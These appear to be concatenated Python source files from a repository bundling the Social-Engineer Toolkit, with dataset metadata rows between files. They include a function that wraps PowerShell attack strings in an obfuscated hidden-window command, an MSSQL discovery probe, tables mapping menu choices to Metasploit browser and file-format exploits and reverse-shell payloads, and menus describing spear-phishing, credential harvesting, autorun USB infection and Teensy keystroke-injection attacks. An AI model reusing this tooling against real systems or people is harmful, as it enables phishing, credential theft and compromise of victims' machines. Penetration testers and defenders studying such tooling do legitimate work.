# print a list of IP addresses based on the CIDR block specified
def printCIDR(c):
parts = c.split("/")
baseIP = ip2bin(parts[0])
subnet = int(parts[1])
# Python string-slicing weirdness:
# if a subnet of 32 was specified simply print the single IP
if subnet == 32:
ipaddr = bin2ip(baseIP)
# for any other size subnet, print a list of IP addresses by concatenating
# the prefix with each of the suffixes in the subnet
else:
ipPrefix = baseIP[:-(32 - subnet)]
breakdown = ''
for i in range(2**(32 - subnet)):
ipaddr = bin2ip(ipPrefix + dec2bin(i, (32 - subnet)))
ip_check = is_valid_ip(ipaddr)
if ip_check != False:
# return str(ipaddr)
breakdown = breakdown + str(ipaddr) + ","
return breakdown
# input validation routine for the CIDR block specified
def validateCIDRBlock(b):
# appropriate format for CIDR block ($prefix/$subnet)
p = re.compile("^([0-9]{1,3}\.){0,3}[0-9]{1,3}(/[0-9]{1,2}){1}$")
if not p.match(b):
return False
# extract prefix and subnet size
prefix, subnet = b.split("/")
# each quad has an appropriate value (1-255)
quads = prefix.split(".")
for q in quads:
if (int(q) < 0) or (int(q) > 255):
# print "Error: quad "+str(q)+" wrong size."
return False
# subnet is an appropriate value (1-32)
if (int(subnet) < 1) or (int(subnet) > 32):
print("Error: subnet " + str(subnet) + " wrong size.")
return False
# passed all checks -> return True
return True
# Queries a remote host on UDP:1434 and returns MSSQL running port
# Written by Larry Spohn (spoonman) @ TrustedSec
def get_sql_port(host):
# Build the socket with a .1 second timeout
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(.2)
# Attempt to query UDP:1434 and return MSSQL running port
try:
sql_port = None
try:
port = 1434
msg = "\x02\x41\x41\x41\x41"
s.sendto(msg, (host, port))
d = s.recvfrom(1024)
sql_port = d[0].split(";")[9]
# if we have an exception, udp 1434 isnt there could be firewalled off
# so we need to check 1433 just in case
except:
sql_port = "1433"
pass
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(.2)
s.connect((host, int(sql_port)))
return_host = host + ":" + sql_port
if return_host != ":" + sql_port:
return host + ":" + sql_port
# if port is closed
except:
return None
except Exception as err:
print(err)
pass
# capture output from a function
def capture(func, *args, **kwargs):
"""Capture the output of func when called with the given arguments.
The function output includes any exception raised. capture returns
a tuple of (function result, standard output, standard error).
"""
stdout, stderr = sys.stdout, sys.stderr
sys.stdout = c1 = io.StringIO()
sys.stderr = c2 = io.StringIO()
result = None
try:
result = func(*args, **kwargs)
except:
traceback.print_exc()
sys.stdout = stdout
sys.stderr = stderr
return (result, c1.getvalue(), c2.getvalue())
# check to see if we are running backbox linux
def check_backbox():
if os.path.isfile("/etc/issue"):
backbox = open("/etc/issue", "r")
backboxdata = backbox.read()
if "BackBox" in backboxdata:
return "BackBox"
# if we aren't running backbox
else:
return "Non-BackBox"
else:
print("[!] Not running a Debian variant..")
return "Non-BackBox"
# check to see if we are running kali linux
def check_kali():
if os.path.isfile("/etc/apt/sources.list"):
kali = open("/etc/apt/sources.list", "r")
kalidata = kali.read()
if "kali" in kalidata:
return "Kali"
# if we aren't running kali
else:
return "Non-Kali"
else:
print("[!] Not running a Debian variant..")
return "Non-Kali"
# here we give multiple options to specify for SET java applet
def applet_choice():
# prompt here
print("""
[-------------------------------------------]
Java Applet Configuration Options Below
[-------------------------------------------]
Next we need to specify whether you will use your own self generated java applet, built in applet, or your own code signed java applet. In this section, you have all three options available. The first will create a self-signed certificate if you have the java jdk installed. The second option will use the one built into SET, and the third will allow you to import your own java applet OR code sign the one built into SET if you have a certificate.
Select which option you want:
1. Make my own self-signed certificate applet.
2. Use the applet built into SET.
3. I have my own code signing certificate or applet.\n""")
choice1 = raw_input("Enter the number you want to use [1-3]: ")
# use the default
if choice1 == "":
choice1 = "2"
# make our own
if choice1 == "1":
try:
import src.html.unsigned.self_sign
except:
module_reload(src.html.unsigned.self_sign)
# if we need to use the built in applet
if choice1 == "2":
print_status(
"Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of Java :(")
# if we want to build our own
if choice1 == "3":
try:
import src.html.unsigned.verified_sign
except:
module_reload(src.html.unsigned.verified_sign)
# reload module function for python 2 and python 3
def module_reload(module):
if sys.version_info >= (3, 0):
import importlib
importlib.reload(module)
else:
reload(module)
# used to replace any input that we have from python 2 to python 3
def input(string):
return raw_input(string)
# fetch URL needed for web cloning
def fetch_template():
fileopen = open(userconfigpath + "site.template").readlines()
for line in fileopen:
line = line.rstrip()
match = re.search("URL=", line)
if match:
line = line.split("=")
return line[1]
# tail a file
def tail(filename):
if os.path.isfile(filename):
file = open(filename, 'r')
st_results = os.stat(filename)
st_size = st_results[6]
file.seek(st_size)
while 1:
where = file.tell()
line = file.readline()
if not line:
time.sleep(1)
file.seek(where)
else:
print(line,) # already has newline
else:
print_error("File not found, cannot tail.")
# this will create an obfsucated powershell encoded command string to be
# used through SET
def powershell_encodedcommand(ps_attack):
ran1 = generate_random_string(1, 2)
ran2 = generate_random_string(1, 2)
ran3 = generate_random_string(1, 2)
ran4 = generate_random_string(1, 2)
full_attack = ('powershell -w 1 -C "sv {0} -;sv {1} ec;sv {2} ((gv {3}).value.toString()+(gv {4}).value.toString());powershell (gv {5}).value.toString() \''.format(ran1, ran2, ran3, ran1, ran2, ran3) + ps_attack + '\'"')
return full_attack
# 'powershell -w 1 -C "sv %s -;sv %s ec;sv %s ((gv %s).value.toString()+(gv %s).value.toString());powershell (gv %s).value.toString() "' % (ran1, ran2, ran3, ran1, ran2, ran3)
| 69,263 | Python | .py | 1,616 | 33.243812 | 1,711 | 0.564226 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,842 | update_config.py | CHEGEBB_africana-framework/externals/set/src/core/update_config.py | #!/usr/bin/env python3
import sys
"""
update_config.py:
This module converts the user-editable set.config text file
into a python module file. This allows the user to edit
the configuration with easily understandable values such
as "ON" or "OFF", but yet SET operates with a module from
which variables can be imported and boolean values operated
upon.
"""
import os
from src.core.setcore import print_status, print_info, print_error, return_continue
import datetime
from time import sleep
definepath = os.getcwd()
# TODO
# * integers should not have quotes
# * paths should be double-quoted
# * Booleans should not be quoted
def value_type(value):
""" Determines whether the setting parameter should be quoted. """
return {
'METASPLOIT_PATH': True,
'METASPLOIT_DATABASE': True,
'ENCOUNT': False,
'AUTO_MIGRATE': False,
'CUSTOM_EXE': True,
'BACKDOOR_EXECUTION': False,
'METERPRETER_MULTI_SCRIPT': False,
'LINUX_METERPRETER_MULTI_SCRIPT': False,
'METERPRETER_MULTI_COMMANDS': True,
'LINUX_METERPRETER_MULTI_COMMANDS': True,
'METASPLOIT_IFRAME_PORT': False,
'ETTERCAP': False,
'ETTERCAP_PATH': True,
'ETTERCAP_DSNIFF_INTERFACE': True,
'DSNIFF': False,
'AUTO_DETECT': False,
'SENDMAIL': False,
'EMAIL_PROVIDER': True,
'WEBATTACK_EMAIL': False,
'APACHE_SERVER': False,
'APACHE_DIRECTORY': True,
'WEB_PORT': False,
'JAVA_ID_PARAM': True,
'JAVA_REPEATER': False,
'JAVA_TIME': True,
'WEBATTACK_SSL': False,
'SELF_SIGNED_CERT': False,
'PEM_CLIENT': True,
'PEM_SERVER': True,
'WEBJACKING_TIME': False,
'COMMAND_CENTER_INTERFACE': True,
'COMMAND_CENTER_PORT': False,
'SET_INTERACTIVE_SHELL': False,
'TERMINAL': True,
'DIGITAL_SIGNATURE_STEAL': False,
'UPX_ENCODE': False,
'UPX_PATH': True,
'AUTO_REDIRECT': False,
'HARVESTER_REDIRECT': False,
'HARVESTER_URL': True,
'UNC_EMBED': False,
'ACCESS_POINT_SSID': True,
'AIRBASE_NG_PATH': True,
'DNSSPOOF_PATH': True,
'AP_CHANNEL': False,
'POWERSHELL_INJECTION': False,
'POWERSHELL_VERBOSE': False,
'WEB_PROFILER': False,
'OSX_REVERSE_PORT': False,
'LINUX_REVERSE_PORT': False,
'USER_AGENT_STRING': True,
'SET_SHELL_STAGER': False,
'AUTOMATIC_LISTENER': False,
'METASPLOIT_MODE': False,
'HARVESTER_LOG': True,
'STAGE_ENCODING': False,
'TRACK_EMAIL_ADDRESSES': False,
'WGET_DEEP': True
}.get(value, "ERROR")
def update_config():
if not os.path.isdir("/etc/setoolkit"):
os.makedirs("/etc/setoolkit")
init_file = open("/etc/setoolkit/set.config", "r")
new_config = open("/etc/setoolkit/set_config.py", "w")
timestamp = str(datetime.datetime.now())
new_config.write("""#!/usr/bin/python3\n
#######################################################################
## DO NOT MODIFY THIS FILE ##
#######################################################################
# This file is generated by a routine inside SET, for use by SET. #
# #
# Settings should be modified in the set.config file, and then #
# SET updated using the 'Update SET Configuration' menu item in #
# the main menu. This file will be updated with the new settings. #
# #
# set.config.py generated: """ + timestamp + """ #
# #
#######################################################################
CONFIG_DATE='""" + timestamp + """'\n""")
for line in init_file:
try:
if not line.startswith("#"):
line = line.rstrip()
line = line.split("=")
setting = line[0]
value = line[1]
if value == "ON":
value = "True"
elif value == "OFF":
value = "False"
else:
pass
quoted = value_type(setting)
if quoted:
new_config.write(setting + '="' + value + '"\n')
else:
new_config.write(setting + '=' + value + '\n')
except:
pass
init_file.close()
new_config.close()
sleep(1)
sys.path.append("/etc/setoolkit")
from set_config import CONFIG_DATE as verify
print_info("New set.config.py file generated on: %s" % timestamp)
print_info("Verifying configuration update...")
if verify == timestamp:
print_status("Update verified, config timestamp is: %s" % timestamp)
else:
print_error("Update failed? Timestamp on config file is: %s" % verify)
print_status("SET is using the new config, no need to restart")
# return_continue()
if __name__ == "__main__":
update_config()
| 5,243 | Python | .py | 137 | 30.620438 | 83 | 0.536044 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,843 | dictionaries.py | CHEGEBB_africana-framework/externals/set/src/core/dictionaries.py | #!/usr/bin/env python3
""" Python lists used for quick conversion of user input
to strings used by the toolkit
"""
def encoder_type(encode):
"""
Takes the value sent from the user encoding menu and returns
the actual value to be used.
"""
return {
'0': "",
'1': "shikata_ga_nai",
'2': "",
'3': "MULTIENCODE",
'4': "BACKDOOR",
}.get(encode, "ERROR")
def ms_module(exploit):
""" Receives the input given by the user from gen_payload.py """
return {
'1': "exploit/multi/browser/adobe_flash_hacking_team_uaf",
'2': "exploit/multi/browser/adobe_flash_nellymoser_bof",
'3': "exploit/multi/browser/adobe_flash_shader_drawing_fill",
'4': "exploit/windows/browser/ms14_012_textrange",
'5': "exploit/windows/browser/ms14_012_cmarkup_uaf",
'6': "exploit/windows/browser/ms13_080_cdisplaypointer",
'7': "exploit/windows/browser/ie_setmousecapture_uaf",
'8': "exploit/multi/browser/java_jre17_jmxbean_2",
'9': "exploit/multi/browser/java_jre17_jmxbean",
'10': "exploit/windows/browser/ms13_009_ie_slayoutrun_uaf",
'11': "exploit/windows/browser/ie_cbutton_uaf",
'12': "exploit/multi/browser/java_jre17_exec",
'13': "exploit/windows/browser/ie_execcommand_uaf",
'14': "exploit/multi/browser/java_atomicreferencearray",
'15': "exploit/multi/browser/java_verifier_field_access",
'16': "exploit/windows/browser/ms12_037_same_id",
'17': "exploit/windows/browser/msxml_get_definition_code_exec",
'18': "exploit/windows/browser/adobe_flash_rtmp",
'19': "exploit/windows/browser/adobe_flash_mp4_cprt",
'20': "exploit/windows/browser/ms12_004_midi",
'21': "multi/browser/java_rhino\nset target 1",
'22': "windows/browser/ms11_050_mshtml_cobjectelement",
'23': "windows/browser/adobe_flashplayer_flash10o",
'24': "windows/browser/cisco_anyconnect_exec",
'25': "windows/browser/ms11_003_ie_css_import",
'26': "windows/browser/wmi_admintools",
'27': "windows/browser/ms10_090_ie_css_clip",
'28': "windows/browser/java_codebase_trust",
'29': "windows/browser/java_docbase_bof",
'30': "windows/browser/webdav_dll_hijacker",
'31': "windows/browser/adobe_flashplayer_avm",
'32': "windows/browser/adobe_shockwave_rcsl_corruption",
'33': "windows/browser/adobe_cooltype_sing",
'34': "windows/browser/apple_quicktime_marshaled_punk",
'35': "windows/browser/ms10_042_helpctr_xss_cmd_exec",
'36': "windows/browser/ms10_018_ie_behaviors",
'37': "windows/browser/ms10_002_aurora",
'38': "windows/browser/ms10_018_ie_tabular_activex",
'39': "windows/browser/ms09_002_memory_corruption",
'40': "windows/browser/ms09_072_style_object",
'41': "windows/browser/ie_iscomponentinstalled",
'42': "windows/browser/ms08_078_xml_corruption",
'43': "windows/browser/ie_unsafe_scripting",
'44': "multi/browser/firefox_escape_retval",
'45': "windows/browser/mozilla_mchannel",
'46': "auxiliary/server/browser_autopwn",
}.get(exploit, "ERROR")
# called from gen_payload.py
# uses payload_menu_2
def ms_payload(payload):
"""
Receives the input given by the user from create_payload.py
and create_payloads.py
"""
return {
'1': "windows/shell_reverse_tcp",
'2': "windows/meterpreter/reverse_tcp",
'3': "windows/vncinject/reverse_tcp",
'4': "windows/x64/shell_reverse_tcp",
'5': "windows/x64/meterpreter/reverse_tcp",
'6': "windows/meterpreter/reverse_tcp_allports",
'7': "windows/meterpreter/reverse_https",
'8': "windows/meterpreter/reverse_tcp_dns",
'9': "windows/download_exec",
}.get(payload, "ERROR")
# called from create_payloads.py
def ms_payload_2(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1': "shellcode/pyinject",
'2': "shellcode/multipyinject",
'3': "set/reverse_shell",
'4': "set/reverse_shell",
'5': "set/reverse_shell",
'6': "shellcode/alphanum",
# '7': "7",
'8': "cmd/multi",
}.get(payload, "ERROR")
def ms_payload_3(payload):
""" Receives the input given by the user from create_payloadS.py """
return {
'1': "windows/shell_reverse_tcp",
'2': "windows/meterpreter/reverse_tcp",
'3': "windows/vncinject/reverse_tcp",
'4': "windows/x64/shell_reverse_tcp",
'5': "windows/x64/meterpreter/reverse_tcp",
'6': "windows/x64/shell_bind_tcp",
'7': "windows/meterpreter/reverse_https",
}.get(payload, "ERROR")
# uses create_payloads_menu
def ms_attacks(exploit):
""" Receives the input given by the user from create_payload.py """
return {
'1': "dll_hijacking",
'2': "unc_embed",
'3': "exploit/windows/fileformat/ms15_100_mcl_exe",
'4': "exploit/windows/fileformat/ms14_017_rtf",
'5': "exploit/windows/fileformat/ms11_006_createsizeddibsection",
'6': "exploit/windows/fileformat/ms10_087_rtf_pfragments_bof",
'7': "exploit/windows/fileformat/adobe_flashplayer_button",
'8': "exploit/windows/fileformat/adobe_cooltype_sing",
'9': "exploit/windows/fileformat/adobe_flashplayer_newfunction",
'10': "exploit/windows/fileformat/adobe_collectemailinfo",
'11': "exploit/windows/fileformat/adobe_geticon",
'12': "exploit/windows/fileformat/adobe_jbig2decode",
'13': "exploit/windows/fileformat/adobe_pdf_embedded_exe",
'14': "exploit/windows/fileformat/adobe_utilprintf",
'15': "custom/exe/to/vba/payload",
'16': "exploit/windows/fileformat/adobe_u3d_meshdecl",
'17': 'exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs',
'18': "exploit/windows/fileformat/foxit_title_bof",
'19': "exploit/windows/fileformat/apple_quicktime_pnsize",
'20': "exploit/windows/fileformat/nuance_pdf_launch_overflow",
'21': "exploit/windows/fileformat/adobe_reader_u3d",
'22': "exploit/windows/fileformat/ms12_027_mscomctl_bof",
}.get(exploit, "INVALID")
def teensy_config(choice):
""" Receives the input given by the user from set.py """
return {
'1': "powershell_down.ino",
'2': "wscript.ino",
'3': "powershell_reverse.ino",
'4': "beef.ino",
'5': "java_applet.ino",
'6': "gnome_wget.ino"
}.get(choice, "ERROR")
def webattack_vector(attack_vector):
""" Receives the input given by the user from set.py """
return {
'1': "java",
'2': "browser",
'3': "harvester",
'4': "tabnapping",
'5': "webjacking",
'6': "multiattack",
}.get(attack_vector, "ERROR")
def category(category):
"""
Takes the value sent from the user encoding menu and returns
the actual value to be used.
"""
return {
'0': "0",
'1': "phishing",
'2': "webattack",
'3': "infectious",
'4': "payloads",
'5': "mailer",
'6': "arduino",
'7': "sms",
'8': "wireless",
'9': "modules",
'10': "cloner",
'11': "harvester",
'12': "tabnapping",
'13': "teensy",
'14': "binary2teensy",
'15': "dll_hijacking",
'16': "multiattack",
'17': "java_applet",
'18': "encoding",
'19': "fasttrack",
'20': "autopwn",
'21': "mssql",
'22': "scan",
'23': "direct",
'24': "exploits",
'25': "active_target",
'26': "shell",
'27': "set",
'28': "teensy2powershell",
'29': "powershell",
'30': "delldrac",
'31': "ridenum",
'32': "psexec",
}.get(category, "ERROR")
| 7,980 | Python | .py | 195 | 33.194872 | 73 | 0.606346 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,844 | text.py | CHEGEBB_africana-framework/externals/set/src/core/menu/text.py | #!/usr/bin/env python3
########################################################################
#
# text menu for set menu stuff
#
########################################################################
from src.core.setcore import bcolors, get_version, check_os, meta_path
# grab version of SET
define_version = get_version()
# check operating system
operating_system = check_os()
# grab metasploit path
msf_path = meta_path()
PORT_NOT_ZERO = "Port cannot be zero!"
PORT_TOO_HIGH = "Let's stick with the LOWER 65,535 ports..."
main_text = " Select from the menu:\n"
main_menu = ['Social-Engineering Attacks',
'Penetration Testing (Fast-Track)',
'Third Party Modules',
'Update the Social-Engineer Toolkit',
'Update SET configuration',
'Help, Credits, and About']
main = ['Spear-Phishing Attack Vectors',
'Website Attack Vectors',
'Infectious Media Generator',
'Create a Payload and Listener',
'Mass Mailer Attack',
'Arduino-Based Attack Vector',
'Wireless Access Point Attack Vector',
'QRCode Generator Attack Vector',
'Powershell Attack Vectors',
'Third Party Modules']
spearphish_menu = ['Perform a Mass Email Attack',
'Create a FileFormat Payload',
'Create a Social-Engineering Template',
'0D']
spearphish_text = ("""
The """ + bcolors.BOLD + """Spearphishing""" + bcolors.ENDC + """ module allows you to specially craft email messages and send
them to a large (or small) number of people with attached fileformat malicious
payloads. If you want to spoof your email address, be sure "Sendmail" is in-
stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!
""")
webattack_menu = ['Java Applet Attack Method',
'Metasploit Browser Exploit Method',
'Credential Harvester Attack Method',
'Tabnabbing Attack Method',
'Web Jacking Attack Method',
'Multi-Attack Web Method',
'HTA Attack Method',
'0D']
fasttrack_menu = ['Microsoft SQL Bruter',
'Custom Exploits',
'SCCM Attack Vector',
'Dell DRAC/Chassis Default Checker',
'RID_ENUM - User Enumeration Attack',
'PSEXEC Powershell Injection',
'0D']
fasttrack_text = ("""
Welcome to the Social-Engineer Toolkit - """ + bcolors.BOLD + """Fast-Track Penetration Testing platform""" + bcolors.ENDC + """. These attack vectors
have a series of exploits and automation aspects to assist in the art of penetration testing. SET
now incorporates the attack vectors leveraged in Fast-Track. All of these attack vectors have been
completely rewritten and customized from scratch as to improve functionality and capabilities.
""")
fasttrack_exploits_menu1 = ['MS08-067 (Win2000, Win2k3, WinXP)',
'Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7)',
'Solarwinds Storage Manager 5.1.0 Remote SYSTEM SQL Injection Exploit',
'RDP | Use after Free - Denial of Service',
'MySQL Authentication Bypass Exploit',
'F5 Root Authentication Bypass Exploit',
'0D']
fasttrack_exploits_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Exploits Section""" + bcolors.ENDC + """. This
menu has obscure exploits and ones that are primarily python driven. This will continue to grow over time.
""")
fasttrack_mssql_menu1 = ['Scan and Attack MSSQL',
'Connect directly to MSSQL',
'0D']
fasttrack_mssql_text1 = ("""
Welcome to the Social-Engineer Toolkit - Fast-Track Penetration Testing """ + bcolors.BOLD + """Microsoft SQL Brute Forcer""" + bcolors.ENDC + """. This
attack vector will attempt to identify live MSSQL servers and brute force the weak account passwords that
may be found. If that occurs, SET will then compromise the affected system by deploying a binary to
hexadecimal attack vector which will take a raw binary, convert it to hexadecimal and use a staged approach
in deploying the hexadecimal form of the binary onto the underlying system. At this point, a trigger will occur
to convert the payload back to a binary for us.
""")
webattack_text = ("""
The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
The """ + bcolors.BOLD + """Java Applet Attack""" + bcolors.ENDC + """ method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
The """ + bcolors.BOLD + """Metasploit Browser Exploit""" + bcolors.ENDC + """ method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
The """ + bcolors.BOLD + """Credential Harvester""" + bcolors.ENDC + """ method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.
The """ + bcolors.BOLD + """TabNabbing""" + bcolors.ENDC + """ method will wait for a user to move to a different tab, then refresh the page to something different.
The """ + bcolors.BOLD + """Web-Jacking Attack""" + bcolors.ENDC + """ method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.
The """ + bcolors.BOLD + """Multi-Attack""" + bcolors.ENDC + """ method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.
The """ + bcolors.BOLD + """HTA Attack""" + bcolors.ENDC + """ method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.
""")
webattack_vectors_menu = ['Web Templates',
'Site Cloner',
'Custom Import\n',
]
webattack_vectors_text = ("""
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
""")
teensy_menu = ['Powershell HTTP GET MSF Payload',
'WSCRIPT HTTP GET MSF Payload',
'Powershell based Reverse Shell Payload',
'Internet Explorer/FireFox Beef Jack Payload',
'Go to malicious java site and accept applet Payload',
'Gnome wget Download Payload',
'Binary 2 Teensy Attack (Deploy MSF payloads)',
'SDCard 2 Teensy Attack (Deploy Any EXE)',
'SDCard 2 Teensy Attack (Deploy on OSX)',
'X10 Arduino Sniffer PDE and Libraries',
'X10 Arduino Jammer PDE and Libraries',
'Powershell Direct ShellCode Teensy Attack',
'Peensy Multi Attack Dip Switch + SDCard Attack',
'HID Msbuild compile to memory Shellcode Attack',
'0D']
teensy_text = ("""
The """ + bcolors.BOLD + """Arduino-Based Attack""" + bcolors.ENDC + """ Vector utilizes the Arduin-based device to
program the device. You can leverage the Teensy's, which have onboard
storage and can allow for remote code execution on the physical
system. Since the devices are registered as USB Keyboard's it
will bypass any autorun disabled or endpoint protection on the
system.
You will need to purchase the Teensy USB device, it's roughly
$22 dollars. This attack vector will auto generate the code
needed in order to deploy the payload on the system for you.
This attack vector will create the .pde files necessary to import
into Arduino (the IDE used for programming the Teensy). The attack
vectors range from Powershell based downloaders, wscript attacks,
and other methods.
For more information on specifications and good tutorials visit:
http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
Special thanks to: IronGeek, WinFang, and Garland
This attack vector also attacks X10 based controllers, be sure to be leveraging
X10 based communication devices in order for this to work.
Select a payload to create the pde file to import into Arduino:
""")
wireless_attack_menu = ['Start the SET Wireless Attack Vector Access Point',
'Stop the SET Wireless Attack Vector Access Point',
'0D']
wireless_attack_text = """
The """ + bcolors.BOLD + """Wireless Attack""" + bcolors.ENDC + """ module will create an access point leveraging your
wireless card and redirect all DNS queries to you. The concept is fairly
simple, SET will create a wireless access point, dhcp server, and spoof
DNS to redirect traffic to the attacker machine. It will then exit out
of that menu with everything running as a child process.
You can then launch any SET attack vector you want, for example the Java
Applet attack and when a victim joins your access point and tries going to
a website, will be redirected to your attacker machine.
This attack vector requires AirBase-NG, AirMon-NG, DNSSpoof, and dhcpd3.
"""
infectious_menu = ['File-Format Exploits',
'Standard Metasploit Executable',
'0D']
infectious_text = """
The """ + bcolors.BOLD + bcolors.GREEN + """Infectious """ + bcolors.ENDC + """USB/CD/DVD module will create an autorun.inf file and a
Metasploit payload. When the DVD/USB/CD is inserted, it will automatically
run if autorun is enabled.""" + bcolors.ENDC + """
Pick the attack vector you wish to use: fileformat bugs or a straight executable.
"""
# used in create_payloads.py
if operating_system != "windows":
if msf_path != False:
payload_menu_1 = [
'Meterpreter Memory Injection (DEFAULT) This will drop a meterpreter payload through powershell injection',
'Meterpreter Multi-Memory Injection This will drop multiple Metasploit payloads via powershell injection',
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP',
'ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec',
'Import your own executable Specify a path for your own executable',
'Import your own commands.txt Specify payloads to be sent via command line\n']
if operating_system == "windows" or msf_path == False:
payload_menu_1 = [
'SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET',
'SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support',
'RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP\n']
payload_menu_1_text = """
What payload do you want to generate:
Name: Description:
"""
# used in gen_payload.py
payload_menu_2 = [
'Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker',
'Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter',
'Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter',
'Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter',
'Download/Run your Own Executable Downloads an executable and runs it\n'
]
payload_menu_2_text = """\n"""
payload_menu_3_text = ""
payload_menu_3 = [
'Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker',
'Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker',
'Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker',
'Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline',
'Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter',
'Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system',
'Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter\n']
# called from create_payload.py associated dictionary = ms_attacks
create_payloads_menu = [
'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)',
'SET Custom Written Document UNC LM SMB Capture Attack',
'MS15-100 Microsoft Windows Media Center MCL Vulnerability',
'MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)',
'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow',
'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)',
'Adobe Flash Player "Button" Remote Code Execution',
'Adobe CoolType SING Table "uniqueName" Overflow',
'Adobe Flash Player "newfunction" Invalid Pointer Use',
'Adobe Collab.collectEmailInfo Buffer Overflow',
'Adobe Collab.getIcon Buffer Overflow',
'Adobe JBIG2Decode Memory Corruption Exploit',
'Adobe PDF Embedded EXE Social Engineering',
'Adobe util.printf() Buffer Overflow',
'Custom EXE to VBA (sent via RAR) (RAR required)',
'Adobe U3D CLODProgressiveMeshDeclaration Array Overrun',
'Adobe PDF Embedded EXE Social Engineering (NOJS)',
'Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow',
'Apple QuickTime PICT PnSize Buffer Overflow',
'Nuance PDF Reader v6.0 Launch Stack Buffer Overflow',
'Adobe Reader u3D Memory Corruption Vulnerability',
'MSCOMCTL ActiveX Buffer Overflow (ms12-027)\n']
create_payloads_text = """
Select the file format exploit you want.
The default is the PDF embedded EXE.\n
********** PAYLOADS **********\n"""
browser_exploits_menu = [
'Adobe Flash Player ByteArray Use After Free (2015-07-06)',
'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)',
'Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)',
'MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)',
'MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)',
'Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)',
'Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)',
'Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)',
'Java Applet JMX Remote Code Execution (2013-01-10)',
'MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)',
'Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)',
'Java 7 Applet Remote Code Execution (2012-08-26)',
'Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)',
'Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)',
'Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)',
'MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)',
'Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)',
'Adobe Flash Player Object Type Confusion (2012-05-04)',
'Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)',
'MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)',
'Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)',
